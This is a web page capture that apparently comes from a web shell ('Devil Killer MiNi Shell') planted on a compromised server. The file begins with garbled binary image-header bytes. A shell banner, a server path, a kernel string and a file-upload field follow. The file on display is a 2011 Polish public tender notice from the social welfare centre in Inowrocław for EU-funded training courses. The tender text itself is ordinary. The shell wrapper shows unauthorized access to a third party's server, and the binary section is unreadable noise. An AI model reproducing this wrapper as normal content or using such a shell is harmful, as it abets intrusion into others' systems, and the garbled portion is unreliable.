JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111027/281819-N-2011.html

<p class="kh_header"><b>Inowrocław: Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej - MOPS.921-9215-7/2011.</b><br>
<b>Numer ogłoszenia: 281819 - 2011; data zamieszczenia: 27.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Św. Ducha 90, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3571031, faks 52 3552450.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej - MOPS.921-9215-7/2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są  Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej- MOPS.921-9215-7/2011.
Zamówienie składa się z 4  części.
I. Opis poszczególnych części zamówienia.
CZĘŚĆ 1: Przedmiotem zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie  Trening wychowawczy.
Ilość osób do przeszkolenia/ ilość grup. Informacja o uczestnikach szkolenia
(Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia   udziału w projekcie.): 39  kobiet bezrobotnych i ich dzieci. Zajęcia będą prowadzone w dwóch grupach: jednej-19 osobowej (19 kobiet) i drugiej-20 osobowej (20 kobiet). Liczba dzieci uczestniczących w zajęciach zostanie określona podczas trwania szkolenia.
Liczba godzin dla grupy szkoleniowej: 25 godzin lekcyjnych dla każdej z grup (łącznie 50 godzin lekcyjnych), w tym 20 godzin dla  kobiet bezrobotnych i 5 godzin (ostatni dzień zajęć) dla kobiet bezrobotnych i ich dzieci.  
Terminy zajęć: 9, 10, 14, 15, 16 listopada 2011 roku.
Ramowy program szkolenia. Cel warsztatów: podniesienie umiejętności wychowawczych uczestniczek poprzez naukę organizowania i spędzania z dziećmi czasu wolnego, zacieśnienie więzi rodzinnych.  
Miejsce szkolenia: 	Inowrocław (łatwy dojazd środkami komunikacji miejskiej z różnych części miasta).
Prowadzący szkolenie:	co najmniej 2 wykładowców/prowadzących. 
Materiały dydaktyczne 	a) materiały niezbędne do realizacji szkolenia,
b) dla wszystkich uczestników szkolenia (tylko kobiet)  oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: 
-materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie,
-materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, 
-notatnik i długopis, teczka z rączką, format A4, laminat błyszczący,
- gra edukacyjna związana z tematyką szkolenia, np. Opowiem Ci, Mamo, Prawda czy fałsz?
Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów
Działania promocyjne:	Wizualizacja kursów zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest  w ramach projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia.
Zaświadczenia	Wykonawca wydrukuje  i wyda w dniu ukończenia szkolenia wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
CZĘŚĆ 2: Przedmiotem zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie  Indywidualne konsultacje pedagogiczne.
-Ilość osób do przeszkolenia/ ilość grup . Informacja o uczestnikach szkolenia
(Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia   udziału w projekcie.).Liczba godzin dla grupy szkoleniowej. Terminy zajęć. :47 osób niepełnosprawnych (w stopniu lekkim i umiarkowanym) w ilości 4 godziny lekcyjne na osobę (łącznie 188 godzin lekcyjnych) w terminie:  17, 18, 21, 22 listopada  2011 r. Wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych. 
Ramowy program szkolenia:	Celem konsultacji jest zdobycie umiejętności komunikowania się i rozwiązywania problemów (także tych związanych z własną niepełnosprawnością) poprzez zmotywowanie uczestniczek     i uczestników do rozwoju własnych pasji i zainteresowań.
Miejsce szkolenia: 	Inowrocław (łatwy dojazd środkami komunikacji miejskiej z różnych części miasta).
Prowadzący szkolenia:	co najmniej 4  prowadzących indywidualne konsultacje pedagogiczne
Materiały dydaktyczne: 	a) materiały niezbędne do realizacji szkolenia,
b) dla wszystkich uczestników szkolenia  oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: 
-materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie.
-materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, 
-notatnik i długopis, teczka z rączką, format A4, laminat błyszczący.
Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów.
Działania promocyjne:	Wizualizacja szkolenia zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl .Wykonawca zobowiązany jest do informowania, że szkolenie  organizowane jest w ramach projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia.
Zaświadczenia:	Wykonawca wydrukuje  i wyda w dniu ukończenia szkolenia  wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
CZĘŚĆ 3: Przedmiotem zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie  Warsztaty prawnicze z elementami edukacji obywatelskiej.
Ilość osób do przeszkolenia/ ilość grup . Informacja o uczestnikach szkolenia
(Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia   udziału w projekcie.). Liczba godzin dla grupy szkoleniowej.Terminy zajęć:Warsztaty prawnicze z elementami edukacji obywatelskiej dla jednej grupy 16 kobiet bezrobotnych (wychowujących dziecko/dzieci niepełnosprawne) w ilości 20 godzin lekcyjnych. Termin warsztatów: 9, 10, 14, 15, 16 listopada 2011 roku. 
Ramowy program szkolenia:	Cel warsztatów: zapoznanie uczestniczek z prawami obywatelskimi, w tym oddolnymi inicjatywami obywateli (podstawy prawne dot. założenia fundacji, stowarzyszenia, spółdzielni socjalnej itp.) oraz aktami prawnymi związanymi z niepełnosprawnością dziecka.
Zajęcia muszą uwzględniać wizytę studyjną, którą należy uwzględnić w złożonym opisie programów.
Miejsce szkolenia: 	Inowrocław (łatwy dojazd środkami komunikacji miejskiej z różnych części miasta)
Prowadzący szkolenia:	co najmniej 1 wykładowca na grupę. 
Materiały dydaktyczne: 	a) materiały niezbędne do realizacji szkolenia,
b) dla wszystkich uczestników szkolenia  oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: 
-materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie,
-materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, 
-notatnik i długopis, teczka z rączką, format A4, laminat błyszczący,
- książka z zakresu  tematyki zajęć.
Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów.
Działania promocyjne:	Wizualizacja kursów zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest  w ramach projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia.
Zaświadczenia:	Wykonawca wydrukuje  i wyda w dniu ukończenia szkolenia wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
CZĘŚĆ 4: Przedmiotem zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie  Warsztaty kreowania własnego wizerunku.
Ilość osób do przeszkolenia/ ilość grup . Informacja o uczestnikach szkolenia
(Zamawiający przewiduje  możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia   udziału w projekcie.).Liczba godzin dla grupy szkoleniowej. Terminy zajęć:	Warsztaty kreowania własnego wizerunku dla 47  osób niepełnosprawnych w ilości 100 godzin lekcyjnych, z czego:
1.	Pierwsze 75 godzin zajęć będzie się odbywać w następujących grupach:
a)	Grupa A -  6 kobiet i 7 mężczyzn z lekkim stopniem niepełnosprawności - 25 godzin lekcyjnych,
b)	Grupa B -  9 kobiet i 8 mężczyzn z umiarkowanym stopniem niepełnosprawności - 25 godzin lekcyjnych,
c)	Grupa C -  8 kobiet i 9 mężczyzn z umiarkowanym stopniem niepełnosprawności - 25 godzin lekcyjnych.

2.	Pozostałe 25 godzin zajęć będzie się odbywać w następujących grupach:
a)	Grupa 24 mężczyzn z grup A, B i C - 5 godzin lekcyjnych,
b)	Grupa 23 kobiet z grup A, B i C - 20 godzin lekcyjnych.
Wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych.
Termin zajęć: 9, 10, 14, 15, 16, 17, 18 listopada  2011 roku
Ramowy program szkolenia:	Celem warsztatów jest m.in. wzmocnienie poczucia atrakcyjności uczestników poprzez dbałość o swój wygląd i higienę oraz poznanie zasad savoir - vivre, doskonalenie umiejętności społecznych. 
Miejsce szkolenia	Inowrocław (łatwy dojazd środkami komunikacji miejskiej z różnych części miasta)
Prowadzący szkolenia:	co najmniej 3  wykładowców 
Materiały dydaktyczne: 	a) materiały niezbędne do realizacji szkolenia,
b) dla wszystkich uczestników szkolenia  oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: 
-materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie,
-materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, 
-notatnik i długopis, teczka z rączką, format A4, laminat błyszczący,
- książka z zakresu  tematyki zajęć.
Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów.
Działania promocyjne:	Wizualizacja kursów zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL),  które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest  w ramach projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia.
Zaświadczenia:	Wykonawca wydrukuje  i wyda w dniu ukończenia szkolenia wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć  Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
II. Warunki lokalowe, sprzętowe  i gastronomiczne obowiązujące Wykonawcę realizującego zamówienie dla wszystkich uczestników  4  szkoleń.

Sale dydaktyczne z oknami zapewniającymi światło dzienne i wietrzenie, z możliwością indywidualnej  aranżacji, wyposażone, w:
- miejsca siedzące dla wszystkich uczestników szkolenia,
- niezbędne materiały potrzebne do realizacji szkolenia
Usługa gastronomiczna: Wykonawca zapewni usługę gastronomiczną podczas kursów składającą się z bufetu  kawowego, w przerwach między zajęciami, składającego się z co najmniej:
-kawa czarna dla każdego uczestnika, ze stosownymi dodatkami, o których mowa poniżej,
-herbata czarna oraz wrzątek w termosach,
-cukier, śmietanka do kawy, cytryna do herbaty  dla wszystkich uczestników
-ciastka kruche minimum 20 dag, na osobę dziennie,
-kostka ciastka lub drożdżówka  lub inne ciastko na osobę dziennie,
-Zamawiający  nie wyklucza jednak, że uczestnicy mogą mieć częstszy dostęp do ww. bufetu, np. gdy takowy znajduje się na końcu sali, gdzie odbywają się zajęcia.


Obowiązkiem Wykonawcy jest:

1.Zorganizowanie i przeprowadzenia szkoleń  dla uczestników projektu.
2. Prowadzenie list obecności uczestników.
3. Sporządzenie i przekazanie do wypełnienia każdemu uczestnikowi szkolenia - ankiety ewaluacyjnej szkolenia  oraz dokonania zbiorczej analizy ankiet, w terminie 7 dni od dnia ukończenia szkolenia.
4. Przedłożenie Zamawiającemu (w terminie 7 dni od dnia ukończenia kursu) raportu z realizacji szkolenia zgodnie z załącznikiem.
5. Przestrzeganie przepisów o ochronie danych osobowych zgodnie z ustawą z dnia 29.09.1997 r., o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926, z późn. zm).
6. Zagwarantowanie odbywania się zajęć od poniedziałku do piątku w godz. 8.00-16.30 dla części 1,3 i 4 oraz w godz. 8.00-17.30 dla części 2. 1 godzina wynosi: 45 minut zegarowych. Przerwa w trakcie między kolejnymi zajęciami w trakcie kursu  nie może być dłuższa niż trzy dni. Liczby godzin dla poszczególnych szkoleń, o których  mowa w SIWZ, nie uwzględnią przerw.
7. Zapewnienie ubezpieczenia NW dla uczestników zajęć.
8. Dostarczenie Zamawiającemu do celów dokumentacyjnych min. 10 zdjęć z przebiegu zajęć.
9. Umożliwienie przeprowadzenia kontroli. Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli w trakcie szkolenia oraz fotografowania, filmowania itp.
10. Zapewnienie uczestnikom  stałej opieki w miejscu szkolenia. 
11. Przedłożenie Zamawiającemu (w terminie 7 dni od dnia ukończenia szkolenia) protokołu z realizacji kursu zgodnie z załącznikiem.
12. Zamawiający przekaże Wykonawcy imienną listę uczestników.
13. Wykonawca zobowiązuje się do zapoznania się z treścią następujących wytycznych: Wytyczne w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki oraz  Zasady przygotowania, realizacji i rozliczania projektów systemowych Ośrodków Pomocy Społecznej, Powiatowych Centrów Pomo-cy Rodzinie oraz Regionalnego Ośrodka Polityki Społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013 oraz zobowiązuje się do wykonania zamówienia zgodnie ze wskazanymi w ww. dokumentach zasadami. 3.8. Zamawiający, działając na podstawie art. 93 ust. 1 pkt 1a ustawy Prawo zamówień publicznych zastrzega możliwość unieważnienia przedmiotowego postępowania w przypadku, kiedy środki pochodzące z budżetu Unii Europejskiej, które zamierza przeznaczyć na sfinansowanie niniejszego zamówienia, nie zostaną mu przyznane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 09.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1, 2, 3, 4  zamówienia nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1, 2, 3, 4 zamówienia
Wykonawca winien posiadać doświadczenie w organizowaniu i prowadzeniu szkoleń/ warsz-tatów/kursów specjalistycznych odpowiadających tematyką przedmiotowi objętemu zamówieniem, o którego udzielenie ubiega się Wykonawca. Warunek ten będzie spełniony przez Wykonawcę, jeżeli zrealizował on należycie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi polegające na zorganizowaniu i przeprowadzeniu co najmniej jednego szkolenia/ warsztatu/ kursu. Przy czym wskazane przez Wykonawcę w wykazie usługi muszą odpowiadać tematyką  kursom, na które składana jest oferta - minimum jedno wykonane szkolenie /warsztaty/kurs dla każdej części. Spełnianie warunku nastąpi na podstawie  złożonego  wykazu wykonanych usług  (załącznik nr 6  do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1, 2, 3, 4  zamówienia
nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do wykonania zamówienia. Osoby, które będą uczestniczyć w wykonywaniu zamówienia, muszą posiadać wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia



dla części 1 zamówienia
co najmniej 1 osoba posiada wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy/ warsztaty/szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje trening wychowawczy.
dla części 2 zamówienia
co najmniej 1 osoba posiada wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy/ warsztaty/szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje tematykę konsultacji pedagogicznych.
dla części 3  zamówienia
 co najmniej 1 osoba posiada wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy/ warsztaty/szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje poradnictwo prawne lub edukację obywatelską.
dla części 4 zamówienia
co najmniej 1 osoba posiada wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy/ warsztaty/szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje kreowanie własnego wizerunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1, 2, 3, 4  zamówienia
nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
